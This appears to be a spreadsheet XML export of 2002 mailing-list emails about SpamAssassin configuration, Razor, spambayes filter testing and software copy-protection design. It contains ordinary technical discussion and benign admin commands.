Michael Moncur  mgm at starlingtech.com  http://www.starlingtech.com/
"Furious activity is no substitute for understanding." --H. H. Williams-------------------------------------------------------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</si>
  <si>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&gt; If I run spamassassin on this message:
&gt; 
&gt;    http://www.boquist.net/stort-sup-brev
&gt; 
&gt; it seems to hang. Memory usage goes up to 73MB and stays there. I have
&gt; let it run for an hour before I killed it. This was on a
&gt; Pentium-II-366. Yes, I know, a bit slow, but still...
&gt; 
&gt; Can anyone else confirm this hang? Maybe I should just upgrade...Don't run SA on mails this large. Most people tend to ignore mails 
larger than about 250K in spamassassin processing, because it just kills 
performance. There are some known issues with the parsing (such as the 
HTML parsing stuff which is much improved in 2.40 which we're soon to 
release), but nothing that's too likely to be fixed by 2.40. Perhaps in 
2.50 though.Matt.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</si>
  <si>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&gt; Hi Matt, and thanks for your quick reply.
&gt; 
&gt; Matt&gt; Don't run SA on mails this large.
&gt; 
&gt; That would be fine, if I only understood how I should do that. I can't
&gt; find anything in the SA documention that mentions some kind of upper
&gt; limit for the size of a message. What should I put in my user_prefs
&gt; file?
&gt; 
&gt; I run SA from procmail btw, but I can't imagine that procmail would be
&gt; able to check the size of a message before handing it over to SA?That's exactly what it can do::0fw &lt;250000
| spamassassin -P
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin
In directory usw-pr-cvs1:/tmp/cvs-serv7642Modified Files:
      Tag: b2_4_0
	procmailrc.example 
Log Message:
added length limit to sample procmail recipeIndex: procmailrc.example
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/procmailrc.example,v
retrieving revision 1.3
retrieving revision 1.3.2.1
diff -b -w -u -d -r1.3 -r1.3.2.1
--- procmailrc.example	16 Aug 2002 18:34:27 -0000	1.3
+++ procmailrc.example	29 Aug 2002 13:37:43 -0000	1.3.2.1
@@ -1,5 +1,7 @@
-# Pipe the mail through spamassassin
+# Pipe the mail through spamassassin, unless it's over 256k
+# (SpamAssassin can take a long time to process large messages)
 :0fw
+* &lt; 256000
 | spamassassin
 # Move it to the "caughtspam" mbox if it was tagged as spam-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-commits mailing list
Spamassassin-commits@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-commits</t>
  </si>
  <si>
    <t>On Thursday 29 August 2002 16:39 CET Mike Burger wrote:
&gt; &gt;[...]
&gt; &gt; re-check I find it immediately:
&gt; &gt; :0fw
&gt; &gt; * &lt; 250000
&gt; &gt; | spamassassin -P
&gt; &gt;
&gt; &gt; Works perfectly now. Sorry for being such a pest! ;-)
&gt; &gt;[...]
&gt;
&gt; I'm using SA via spamc/spamd, and a global /etc/procmail file.  I'm
&gt; wondering if this would also work in that fashion.spamc will skip every file bigger than 250k on it's own. It's got the 
command line switch -s to change this value. But it doesn't hurt of course 
to use the procmail limit.Malte-- 
-- Coding is art.
--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</si>
  <si>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top.ciao
     Klaus
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk</t>
  </si>
  <si>
    <t xml:space="preserve">
Bart Schaefer said:&gt; This is off the topic of the rest of this discussion, but amavisd (in all
&gt; its incarnations) and MIMEDefang and several other MTA plugins all reject
&gt; at SMTP time messages that scores higher than some threshold (often 10).  argh, they do not, do they?   the FPs must be just gigantic :(&gt; If some new release were to start scoring all spam no higher than 5.1,
&gt; there'd better be _zero_ FPs, because all those filters would drop their
&gt; thresholds to 5.Well, my point is more that we should aim our rescoring algorithm so that
a spam hits 5.0.    Any higher does us no good, as it means an FP is
a lot harder to recover from, using compensation rules.Spams *will* hit higher than that -- that's just the way the scoring works.
but for our code to be effective, and spread the range of scores
correctly, we just have to optimise to hit 1 threshold.--j.
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk</t>
  </si>
  <si>
    <t>On Thu, Aug 29, 2002 at 11:37:02AM +0100, Clayton, Nik [IT] wrote:
&gt; Have the UPPERCASE_* rules been tested on messages in non-English 
&gt; character sets, and/or where the message is MIME encoded in some way?
&gt; 
&gt; I'm getting a lot of false positives on Japanese mail, and I think the 
&gt; encoding is responsible for triggering this rule.Like Justin said, this is fixed in CVS.Dan.
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk</t>
  </si>
  <si>
    <t>jm@jmason.org (Justin Mason) writes:&gt; BTW I tried tweaking some of the scores that lint-rules complained about
&gt; being negative when they shouldn't be, and it *ruined* the results.  it's
&gt; worth hand-tweaking a bit, but in some cases, there's counter-intuitive
&gt; combinatorial effects like the above, so be careful when tweaking; run
&gt; a "./logs-to-c &amp;&amp; ./evolve -C" to check the new hitrates afterwards.My tendency is to say that we shouldn't tweak at all.- Dan</t>
  </si>
  <si>
    <t xml:space="preserve">NananananaCOn Friday, August 30, 2002, at 02:19  AM, Justin Mason wrote:&gt; Looks like my algos aren't flexible enough, and Craig wins ;)
</t>
  </si>
  <si>
    <t xml:space="preserve">Daniel Quinlan wrote:DQ&gt; Before we release, it'd be great if someone could test a few
DQ&gt; additional score ranges.  Maybe we can lower FPs a bit more.  :-)I don't think there's much more room for lowering FPs left which the GA can 
achieve.  Remember, also, that the AWL will reduce FPs, but its effects aren't 
factored in to the GA scores.The work currently being done on the GA, and comparing different methods of 
doing the score-setting, is very worthwhile, and extremely useful; however, we 
really ought to get a release out, since 2.31 is getting decreasingly useful as 
time goes on.The FP/FN rate of 2.40 with pretty well *any* score-setting mechanism will be 
better than 2.31 -- we can continue with adjusting how the scores are set on the 
2.41 or 2.50 branches.DQ&gt; Something like:
DQ&gt; 
DQ&gt;   for (low = -12; low &lt;= -4; low += 2)
DQ&gt;     for (high = 2; high &lt;= 6; high += 2)
DQ&gt;       evolveYou could just allow low and high to be evolved by the GA (within ranges); I'd 
be enormously surprised if it didn't end up with low=-12 and high=+6, since 
that'd give the GA the broadest lattitude in setting individual scores.  The 
issue with fixing low and high is not one of optimization, but rather one of 
human-based concern that individual scores larger than about +4 are dangerous 
and liable to generate FPs, and individual scores less than -8 are dangerous and 
liable to be forged to generate FNs.DQ&gt; Maybe even add a nybias loop.Adding an nybias loop is not worthwhile -- changing nybias scores will just 
alter the evaluation function's idea of what the FP:FN ratio should be.DQ&gt; &gt; AFAIK there's nothing major hanging out waiting to be checked in 
DQ&gt; &gt; on b2_4_0 is there?
DQ&gt; 
DQ&gt; Nope.Great!DQ&gt; &gt; I'll be on IM most of today, tomorrow, and monday while cranking 
DQ&gt; &gt; on the next Deersoft product release (should be a fun one).  Hit 
DQ&gt; &gt; me at:
DQ&gt; &gt; 
DQ&gt; &gt; AIM: hugh3scr
DQ&gt; &gt; ICQ: 1130120
DQ&gt; &gt; MSN: craig@stanfordalumni.org
DQ&gt; &gt; YIM: hughescr
DQ&gt; 
DQ&gt; We've been hanging out on IRC at irc.rhizomatic.net on #spamassassin
DQ&gt; (the timezone difference gets in the way, though).I've been searching for that, but I guess the details of where the channel was 
got lost in the shuffle.C
</t>
  </si>
  <si>
    <t>On Thu, 29 Aug 2002, Rick Beebe wrote:&gt; &gt; cc: Error: spamd/spamc.c, line 50: In this declaration, "in_addr_t" has no
&gt; &gt; linka
&gt; &gt; ge and has a prior declaration in this scope at line number 572 in file
&gt; &gt; /usr/inc
&gt; &gt; lude/sys/types.h. (nolinkage)
&gt; &gt; typedef unsigned long   in_addr_t;      /* base type for internet address
&gt; &gt; */
&gt;
&gt; Don't worry about the warnings. To fix the error, edit spamc.c and right   Thanks for posting this tip - I had the same problem compiling with
Tru64 and that took care of it.   When I did the "make install" I got this error:LOCK:  -f /etc/mail/spamassassin/local.cf
 || cp rules/local.cf /etc/mail/spamassassin/local.cf
sh: syntax error at line 1: `||' unexpected
*** Exit 2
Stop.   It appears that this comes from the "inst_cfs:" part of the Makefile,
which copies local.cf into /etc/mail/spamassassin.  The Makefile has
brackets around the -f test, but they don't show up above.  Any ideas?Jim
*-------------------------------------------------------------------------*
* James H. McCullars                 I Phone: (256) 824-2610              *
* Director of Systems &amp; Operations   I Fax:   (256) 824-6643              *
* Computer &amp; Network Services        I Internet: mccullj@email.uah.edu    *
* The University of Alabama          I -----------------------------------*
*    in Huntsville                   I                                    *
* Huntsville, AL 35899               I This space for rent - CHEAP!       *
*-------------------------------------------------------------------------*-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk</t>
  </si>
  <si>
    <t>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server.cheers,
vipul.
-- Vipul Ved Prakash          |   "The future is here, it's just not 
Software Design Artist     |    widely distributed."
http://vipul.net/          |              -- William Gibson-------------------------------------------------------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</si>
  <si>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know that I did this during the week that all the catalogue's were
hokey but after that I changed it back to discovery.  So I can see why
people are using honor.-----Original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server.cheers,
vipul.
-- Vipul Ved Prakash          |   "The future is here, it's just not 
Software Design Artist     |    widely distributed."
http://vipul.net/          |              -- William Gibson-------------------------------------------------------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</si>
  <si>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I'm after a recipe for using Razor with Sendmail. Unfortunately, I can't 
get Procmail on my hosting but I do have full access to the Sendmail 
alias list.Can anyone point me at some docs for this as I couldn't find anything in 
the Razor docs.--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</si>
  <si>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time.Any employee who has left my company more than three years ago is eligible
to become a trollbox.  I figure after three years of bounced mail, the list
should have figured out they aren't here any more.Fox-------------------------------------------------------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</si>
  <si>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Good day, Fox,On Fri, 23 Aug 2002, Fox wrote:&gt; I recently installed Razor v2.14 and started using it.  I am finding it
&gt; necessary to whitelist a _lot_ of mailing lists.  Some, such as yahoogroups,
&gt; I can't whitelist because the from: address is the person making the post,
&gt; so I will have to whitelist on another field when I can modify my code to do
&gt; so.  I wonder if someone is not being careful about their submissions, or if
&gt; these are bad mailing lists that don't drop bad mail addresses that become
&gt; trollboxes in time.	I've found excellent luck with the X-Been____There header (____'s 
added to to avoid tripping procmail rules):____X-Been____There: news@jabber.org	Cheers,
	- Bill---------------------------------------------------------------------------
	"Nynex.  Iroquois for Moron"
	-- A well-known Linux kernel hacker.
--------------------------------------------------------------------------
William Stearns (wstearns@pobox.com).  Mason, Buildkernel, named2hosts, 
and ipfwadm2ipchains are at:                        http://www.stearns.org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</si>
  <si>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"Bort, Paul"  wrote:
&gt;If your sendmail has been compiled with Milter support, you can add SMRazor
&gt;easily. We've been using it for a while without problems. Others on the list
&gt;have mentioned it as well.
&gt;
&gt;http://www.sapros.com/smrazor/Is there an easy way to tell if Milter is compiled in?--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</si>
  <si>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If you didn't add it when compile would be one way.  Another would be to
grep your sendmail.cf for the word Milter.-----Original Message-----
From: Julian Bond [mailto:julian_bond@voidstar.com] 
Sent: Friday, August 23, 2002 2:48 PM
To: razor-users@example.sourceforge.net
Subject: Re: [Razor-users] Razor with sendmail
"Bort, Paul"  wrote:
&gt;If your sendmail has been compiled with Milter support, you can add 
&gt;SMRazor easily. We've been using it for a while without problems. 
&gt;Others on the list have mentioned it as well.
&gt;
&gt;http://www.sapros.com/smrazor/Is there an easy way to tell if Milter is compiled in?-- 
Julian Bond Email&amp;MSM: julian.bond@voidstar.com
Webmaster:              http://www.ecademy.com/
Personal WebLog:       http://www.voidstar.com/
CV/Resume:          http://www.voidstar.com/cv/
M: +44 (0)77 5907 2173   T: +44 (0)192 0412 433-------------------------------------------------------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</si>
  <si>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isolation.Giorgio Zoppi wrote:&gt;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t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi, 
   I am wondering if there are any techniques to make a CD-Key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 
Yannick Gingras
Network Programer
ESC:wq
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.orgiD8DBQE9bpYzuv7G0DNFO+QRAqBhAKChTeKXwD8zDMwf+okAKJXnnpknwACgtXZ7
v3bBABue0VX/Uy86Fhn9Ifs=
=Uwqj
-----END PGP SIGNATURE-----</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1Le 3 Septembre 2002 12:43, vous avez Ã©crit :
&gt; Yannick,
&gt; You'll want to peruse Fravia's web site on reverse engineering (and other
&gt; things) http://www.woodmann.com/fravia/protec.htm. That specific page
&gt; covers just your concerns.
&gt;
&gt; JoshThanks for the input.  Some of the tips are quite portable but are there any 
special attentions to take when implementing such shemes on a UNIX system ?Thanks.- -- 
Yannick Gingras
Coder for OBB : Ostentatiously Breathless Brother-in-law
http://OpenBeatBox.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.orgiD8DBQE9dQ6guv7G0DNFO+QRApsXAKCjD98foVvLjet3x9ExtihruvT7KACeNayD
wDZlxJXjDmLFhNrN97cd73M=
=4Clx
-----END PGP SIGNATURE-----</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1&gt; What do you mean by "CD-Key or the like" (I presume that "of" was a
&gt; typo)? And what do you mean by "unbreakable"?"of" was a typoUnbreakable would mean here that no one, even previously authorised entity, 
could use the system without paying the periodic subscription fee.&gt; You need to be far more explicit about the problem which you wish to
&gt; solve, and about the constraints involved.It could be an online system that work 95% offline but poll frequently an 
offsite server.  No mass production CDs, maybe mass personalised d/l like Sun 
JDK.Nothing is fixed yet, we are looking at the way a software can be protected 
from unauthorized utilisation.  Is the use of "trusted hardware" really worth it ?  Does it really make it 
more secure ?  Look at the DVDs.- -- 
Yannick Gingras
Coder for OBB : Obdurately Buteonine Bellwether
http://OpenBeatBox.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.orgiD8DBQE9dRrnuv7G0DNFO+QRAk8nAKClAhTmyrUgP3ko+DEjcvj0mqfjzACgwQvo
WZ6/CMUA23HCMZVycd7XD1Q=
=V2G8
-----END PGP SIGNATURE-----</t>
  </si>
  <si>
    <t xml:space="preserve">
Yannick Gingras wrote:&gt;    I am wondering if there are any techniques to make a CD-Key of the like 
&gt; unbreakable.  Either by giving it a cancelation date and a periodic renewal 
&gt; from a server or just by using self md5 signature on the resulting 
&gt; executable.  I know it must not be easy because the whole software piracy 
&gt; problem would be resolved but there must be some way to make it really hard 
&gt; to break it.  Anyone have hints on this issue ?What do you mean by "CD-Key or the like" (I presume that "of" was a
typo)? And what do you mean by "unbreakable"?You need to be far more explicit about the problem which you wish to
solve, and about the constraints involved.Some general points:1. For a conventional "CD key" system, where the actual CDs are
mass-produced (where you have many identical CDs), and the entire
system has to work offline, you cannot solve the problem of valid keys
being "traded" (e.g. included along with bootleg copies of the
product).If there's an online element involved, you can "tie" keys to a
specific hardware configuration, as is done (AFAIK) for Windows XP's
"product activation".2. Anything which uses a symmetric cipher (or hash) is bound to be
vulnerable to reverse engineering of the validation routines within
the executable.3. Ultimately, any software mechanism will be vulnerable to
"cracking", i.e. modifying the software to disable or circumvent the
validation checks.This can only be prevented by the use of trusted hardware (e.g. a
Palladium-style system).Most significantly, the data must be supplied in a form which is only
accessible by that hardware. If anyone can get at the data in a
meaningful (i.e. unencrypted) form, they can extract the useful parts
and discard the rest (i.e. any associated protection mechanisms).IOW, you have to "keep the genie in the bottle" at all times. If the
data can be got at just once (even if it requires the use of dedicated
hardware such as a bus analyser), it can then be duplicated and
distributed without limit.-- 
Glynn Clements 
</t>
  </si>
  <si>
    <t xml:space="preserve">
Yannick Gingras wrote:&gt;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?Answering that requires fairly complete knowledge of the business
model. But, in all probability: no, it isn't usually worth it. So, it
comes down to how difficult you want to make the cracker's job.If the product requires occasional authentication, simple copying
won't work; the product has to be cracked. In which case, the issue is
whether you're actually going to enter into battle with the crackers,
or just make sure that it isn't trivial.A lot of it comes down to your customer base. Teenage kids tend to be
more concerned about cost and less concerned about viruses/trojans,
and so more willing to use warez. Fortune-500 corporations are likely
to view matters differently.&gt; Does it really make it more secure ?Yes; software techniques will only get you so far. Actually, the same
is ultimately true for hardware, but cracking hardware is likely to
require resources other than just labour.Almost (?) anything can be reverse engineered. But it may be possible
to ensure that doing so is uneconomical.&gt; Look at the DVDs.IIRC, CSS was cracked by reverse-engineering a software player; and
one where the developers forgot to encrypt the decryption key at that.-- 
Glynn Clements 
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; Is the use of "trusted hardware" really worth it ?
&gt;
&gt; Answering that requires fairly complete knowledge of the business
&gt; model. But, in all probability: no, it isn't usually worth it. So, it
&gt; comes down to how difficult you want to make the cracker's job.
&gt;
&gt; &gt; Look at the DVDs.
&gt;
&gt; IIRC, CSS was cracked by reverse-engineering a software player; and
&gt; one where the developers forgot to encrypt the decryption key at that.This make me wonder about the relative protection of smart cards.  They have 
an internal procession unit around 4MHz.  Can we consider them as trusted 
hardware ?  The ability to ship smart cards periodicaly uppon cashing of a 
monthly subscription fee would not raise too much the cost of "renting" the 
system.  Smart card do their own self encryption.  Can they be used to 
decrypt data needed by the system ?  The input of the system could me mangled 
and the would keep a reference of how long it was in service.This sounds really feasible but I may be totaly wrong.  I may also be wrong 
about the safety of a smart card.  What do you think ?-- 
Yannick Gingras
Coder for OBB : Oceangoing Bared Bonanza
http://OpenBeatBox.org
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;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illegaly.I agree with all of you that mass production CDs will not be safe from piracy 
in a near futur.  That can be seen as a collateral of mass market 
penetration.BTW thanks for all of you who provided interestiong insight.  I'm playing with 
gdb's dissassembler now but I don't think it's what a typical cracker would 
use.  Any hints on UNIX cracking tools ?Thanks.-- 
Yannick Gingras
Coder for OBB : Onside Brainsick Bract
http://OpenBeatBox.org
</t>
  </si>
  <si>
    <t xml:space="preserve">Yannick Gingras wrote:
&gt; Is the use of "trusted hardware" really worth it ?  Does it really make it 
&gt; more secure ?  Look at the DVDs.DVDs don't use trusted hardware. As for whether it is worth it, that 
depends entirely on what its worth to secure your software.Cheers,Ben.-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff
</t>
  </si>
  <si>
    <t>Errr... not to be pedantic or anything, but this is called "omit one
testing" or OOT in the literature IIRC. Helpful in case you're searching for
additional information, say at http://citeseer.nj.nec.com/ for instance.David LeBlanc
Seattle, WA USA</t>
  </si>
  <si>
    <t>Tim Peters wrote:
&gt; I've run no experiments on training set size yet, and won't hazard a guess
&gt; as to how much is enough.  I'm nearly certain that the 4000h+2750s I've been
&gt; using is way more than enough, though.Okay, I believe you.&gt; Each call to learn() and to unlearn() computes a new probability for every
&gt; word in the database.  There's an official way to avoid that in the first
&gt; two loops, e.g.
&gt; 
&gt;     for msg in spam:
&gt;         gb.learn(msg, True, False)
&gt;     gb.update_probabilities()I did that.  It's still really slow when you have thousands of messages.&gt;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database.I hadn't tried that.  I figured it was better to find out if "all but
one" testing had any appreciable value.  It looks like it doesn't so
I'll forget about it.&gt;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worse?Spammers could exploit this including a large MIME part at the beginning
of the message.  In pratice that would probably work fine.  &gt; sometimes an on-topic message starts well but then rambles.Never.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t>
  </si>
  <si>
    <t xml:space="preserve">David LeBlanc wrote:
&gt; Errr... not to be pedantic or anything, but this is called "omit one
&gt; testing" or OOT in the literature IIRC.I have no idea.  I made up the name.  Thanks for the correction.  Neil
</t>
  </si>
  <si>
    <t>[Skip Montanaro]
&gt; Any thought to wrapping up your spam and ham test sets for
&gt; inclusion w/ the spambayes project?I gave it all the thought it deserved .  It would be wonderful to get
several people cranking on the same test data, and I'm all in favor of that.
OTOH, my Data/ subtree currently has more than 35,000 files slobbering over
134 million bytes -- even if I had a place to put that much stuff, I'm not
sure my ISP would let me email it in one msg .Apart from that, there was a mistake very early on whose outcome was that
this isn't the data I hoped I was using.  I *hoped* I was using a snapshot
of only recent msgs (to match the snapshot this way of only spam from 2002),
but turns out they actually go back to the last millennium.  Greg Ward is
currently capturing a stream coming into python.org, and I hope we can get a
more modern, and cleaner, test set out of that.  But if that stream contains
any private email, it may not be ethically possible to make that available.
Can you think of anyplace to get a large, shareable ham sample apart from a
public mailing list?  Everyone's eager to share their spam, but spam is so
much alike in so many ways that's the easy half of the data collection
problem.</t>
  </si>
  <si>
    <t xml:space="preserve">
    Tim&gt; I gave it all the thought it deserved .  It would be
    Tim&gt; wonderful to get several people cranking on the same test data, and
    Tim&gt; I'm all in favor of that.  OTOH, my Data/ subtree currently has
    Tim&gt; more than 35,000 files slobbering over 134 million bytes -- even if
    Tim&gt; I had a place to put that much stuff, I'm not sure my ISP would let
    Tim&gt; me email it in one msg .Do you have a dialup or something more modern ?  134MB of messages
zipped would probably compress pretty well - under 50MB I'd guess with all
the similarity in the headers and such.  You could zip each of the 10 sets
individually and upload them somewhere.    Tim&gt; Can you think of anyplace to get a large, shareable ham sample
    Tim&gt; apart from a public mailing list?  Everyone's eager to share their
    Tim&gt; spam, but spam is so much alike in so many ways that's the easy
    Tim&gt; half of the data collection problem.How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spam.I save all incoming email for ten days (gzipped mbox format) before it rolls
over and disappears.  At any one time I think I have about 8,000-10,000
messages.  Most of it isn't terribly personal (which I would cull before
passing along anyway) and much of it is machine-generated, so would be of
marginal use.  Finally, it's all ham-n-spam mixed together.  Do we call that
an omelette or a Denny's Grand Slam?Skip
</t>
  </si>
  <si>
    <t>[Tim]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worse?[Neil Schemenauer]
&gt; Spammers could exploit this including a large MIME part at the beginning
&gt; of the message.  In pratice that would probably work fine.Note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enormously.if-you're-out-to-make-a-quick-buck-you-don't-waste-a-second-on-hard-
    targets-ly y'rs  - tim</t>
  </si>
  <si>
    <t xml:space="preserve">
I've got a test set here that's the last 3 and a bit years email to
info@ekit.com and info@ekno.com - it's a really ugly set of 20,000+
messages, currently broken into 7,000 spam, 9,000 ham, 9,000 currently
unclassified. These addresses are all over the 70-some different 
ekit/ekno/ISIConnect websites, so they get a LOT of spam.As well as the usual spam, it also has customers complaining about 
credit card charges, it has people interested in the service and 
asking questions about long distance rates, &amp;c &amp;c &amp;c. Lots and lots 
of "commercial" speech, in other words. Stuff that SA gets pretty 
badly wrong.I'm currently mangling it by feeding all parts (text, html, whatever 
else :) into the filters, as well as both a selected number of headers 
(to, from, content-type, x-mailer), and also a list of 
(header,count_of_header). This is showing up some nice stuff - e.g. the 
X-uidl that stoopid spammers blindly copy into their messages.I did have Received in there, but it's out for the moment, as it causes
rates to drop.I'm also stripping out HTML tags, except for href="" and src="" - there's
so so much goodness in them (note that I'm only keeping the contents of
the attributes). 
--
Anthony Baxter     
It's never too late to have a happy childhood.</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt;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you).*nod* I know - on my todo is to feed the prologue into the system as well.A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7bitThis is a MIME Message------=_NextPart_000_007F_01BDF6C7.FABAC1B0
Content-Type: multipart/alternative; boundary="----=_NextPart_001_0080_01BDF6C7.
FABAC1B0"------=_NextPart_001_0080_01BDF6C7.FABAC1B0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable***** This is an HTML Message ! *****
------=_NextPart_001_0080_01BDF6C7.FABAC1B0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt; Anthony Baxter wrote
&gt; I'm currently mangling it by feeding all parts (text, html, whatever 
&gt; else :) into the filters, as well as both a selected number of headers 
&gt; (to, from, content-type, x-mailer), and also a list of 
&gt; (header,count_of_header). This is showing up some nice stuff - e.g. the 
&gt; X-uidl that stoopid spammers blindly copy into their messages.The other thing on my todo list (probably tonight's tram ride home) is
to add all headers from non-text parts of multipart messages. If nothing
else, it'll pick up most virus email real quick.-- 
Anthony Baxter        
It's never too late to have a happy childhood.</t>
  </si>
  <si>
    <t>HiI've just installed SpamAssassin and relevant modules.
Just tried the initial test: spamassassin -t &lt; sample-nonspam.txt &gt; nonspam.outand got back:Broken PipeI've also tried using the -P and --pipe option but to
no avail.Any help greatly appreciated. BTW - I'm no great Perl
expert!rgdsPeter__________________________________________________
Do You Yahoo!?
Everything you'll ever need on one web page
from News and Sport to Email and Music Charts
http://uk.my.yahoo.com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</si>
  <si>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2 Sep 2002, Richard Kimber wrote:&gt; On Mon, 2 Sep 2002 13:20:46 -0700 (PDT)
&gt; Bart Schaefer  wrote:
&gt; 
&gt; &gt; If you're using "fetchmail --mda spamassassin" or the equivlent, then
&gt; &gt; this change means your current setup will no longer work. 
&gt; 
&gt; Oh well, I guess there are other anti-spam options out there.Well, (a) you don't HAVE to upgrade, and (b) what you are doing has never
been safe in the first place because SpamAssassin 2.31-and-before doesn't
do any kind of file locking while it writes to the mailbox and doesn't
promise to return the proper failure code on disk-full conditions, etc.If you're still willing to live with (b), all you need is a little shell
script to run spamassassin:----------
#!/bin/sh
# call this file "spamassassin-wrapper" and chmod +x it
{
echo "From $1 `date`"
sed -e '1{/^From /d;}' | spamassassin
echo ''
} &gt;&gt; $MAIL
----------And then usefetchmail --mda 'spamassassin-wrapper %F'and you should be all set.-------------------------------------------------------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</si>
  <si>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Update of /cvsroot/spamassassin/spamassassin/masses/tenpass
In directory usw-pr-cvs1:/tmp/cvs-serv26829/tenpassLog Message:
Directory /cvsroot/spamassassin/spamassassin/masses/tenpass added to the repository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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=804jm@jmason.org changed:           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|NEW                         |RESOLVED
         Resolution|                            |FIXED------- Additional Comments From jm@jmason.org  2002-09-02 14:58 -------
ok, now in.-------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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=805------- Additional Comments From felicity@kluge.net  2002-09-02 15:05 -------
from the sa-dev mailing list:"ln -s /dev/null ~root/.razor/razor-agent.log"
The question is, why does 2.40 do this whereas my 2.31 doesn't. Hmmm.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</si>
  <si>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On Mon, 2 Sep 2002, Justin Mason wrote:=&gt;http://spamassassin.org/released/ :
=&gt;
=&gt;  508284 Sep  2 18:27 Mail-SpamAssassin-2.40.tar.gz
=&gt;  561425 Sep  2 18:27 Mail-SpamAssassin-2.40.zip
=&gt;
Not that I'm not grateful, but..... :-)I'd really like to install from a src rpm. Any takers? :-)TIA-- 
-Time flies like the wind. Fruit flies like a banana. Stranger things have -
-happened but none stranger than this. Does your driver's license say Organ
-Donor?Black holes are where God divided by zero. Listen to me! We are all-
-individuals! What if this weren't a hypothetical question? steveo@syslang.net
</t>
  </si>
  <si>
    <t xml:space="preserve">
"Craig R.Hughes" said:&gt; Seems like a good idea.  We might get one of two other issues 
&gt; raised tomorrow too once US people get back to work tomorrow and 
&gt; start downloading 2.40 in earnest.yep, I reckon that's likely.BTW I'm hearing reports about problems resolving spamassassin.org.
Anyone else noticing this?  if it's serious I'll see if I can get
Mark Reynolds to add a 2ndary in the US, to go with the primaries
in Oz.&gt; &gt;    - looks like there may be a razor2 issueI think this is a Razor bug/glitch triggered when file permissions
don't allow its own log system to work.  At least that's the report
I heard on the Razor list in the past...Theo, does it work now that you /dev/null'd the logfile?&gt; &gt;    - version number (says "cvs")
&gt; &gt;    - tag tree as "Rel" this time tooI won't bother tagging with Rel, IMO; I don't think we should
rely on the version control system inside our code, so I've just
put a line in Mail/SpamAssassin.pm instead.   I will of course
tag with a release *label* though.--j.</t>
  </si>
  <si>
    <t xml:space="preserve">
"zeek" said:&gt; This was thoroughly confusing, but by playing musical chairs with the spamd
&gt; args I smashed a bug:
&gt; 
&gt; OK:
&gt; spamd --debug --daemonize --auto-whitelist --username=nobody --allowed-ips=1
&gt; 27.0.0.1"
&gt; OK:
&gt; spamd --debug --daemonize --auto-whitelist --username=nobody --allowed-ips=1
&gt; 27.0.0.1, 192.168.1.1"
&gt; NOT OK:
&gt; spamd --debug --daemonize --auto-whitelist --username=nobody --allowed-ips=1
&gt; 92.168.1.1, 127.0.0.1"fwiw, I can't reproduce this with  spamd --debug --auto-whitelist --allowed-ips="127.0.0.1"
  spamd --debug --auto-whitelist --allowed-ips="127.0.0.1, 192.168.1.1"
  spamd --debug --auto-whitelist --allowed-ips="192.168.1.1, 127.0.0.1"which I presume is what you meant (except for the missing args
of course).  They all seem to work OK.--j.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</si>
  <si>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Thank you Lars for your reply to my query.&gt; SA doesnt do any of these. It is probably a function of whatever scanning
system/MDA
&gt; you're using (amavis, procmail, whatever). What exactly are you using?I am using SpamAssassin as part of the MailScanner package (using sendmail
as the MTA). It integrates nicely in there, and shares a configuration file
with SA. All very neat.&gt; SA in itself does nothing really. You need a frontend (procmail, amavis,
etc)
&gt; at some point in the  mail delivery chain that can hand over the message
&gt; to SA and do whatever other processing you want.I thought that SA rated a message with a certain score, then did a certain
action (such as store | deliver | delete) based on the configuration given.
I was hoping there were some other actions that I could custom-program in.Again, many thanks,
Adrian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</si>
  <si>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Update of /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin
